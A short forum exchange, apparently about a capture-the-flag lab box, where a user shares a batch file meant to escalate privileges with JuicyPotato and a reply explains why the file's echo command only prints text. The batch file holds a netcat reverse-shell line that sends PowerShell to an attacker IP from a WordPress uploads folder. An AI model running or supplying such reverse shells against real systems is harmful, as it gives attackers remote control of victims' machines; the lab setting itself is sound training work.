Starting Point: Shield, JuicyPotato and netcat

@R4ZZB33RY said:
Here’s my .bat file
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.18 5555

I only tried executing the "nc.exe -e powershell.exe part after I ran the js.exe. It worked and connected but didn’t give me root.

All that’s going to do is print text to the screen (because you’re running the “echo” command)